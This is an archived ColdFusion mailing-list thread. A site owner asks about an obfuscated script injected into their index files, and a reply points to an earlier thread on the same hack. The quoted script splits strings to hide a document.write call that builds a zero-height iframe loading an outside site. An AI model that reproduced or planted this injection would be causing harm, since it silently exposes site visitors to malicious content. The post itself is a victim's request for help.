> Has anyone seen anything like this written to any of your sites? > > <script><!-- > var applstrna0 = "<if"; > var applstrna1 = "rame src=http://said7"; > var applstrna2 = ".com/bb/faq.htm"; > var applstrna3 = " width=100 height=0></i"; > var applstrna4 = "frame>"; > document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4); > //--></script> > > The file this was written to is an index.cfm file that has been on the site > for over 8 years. The only line that was in this file was a cflocation to > redirect to another folder. > > The index.html file that this file redirects to is rewritten by CF every > time the site admin makes a change. THAT index.html file had the same script > written to the very bottom of that file as well, but when I made a change > and it was rewritten the script is gone. I can then assume something other > then my CF or any SQL injections are not the culprit. > > I have been unable to contact the hosting company to check their server and > I have also been unable to find anything in my Googling to give me any clues > as to a cause and a cure.
Why yes, check the recent "Question about hack" thread. It's about this very item. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for mo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;207172674;29440083;f Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321640 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4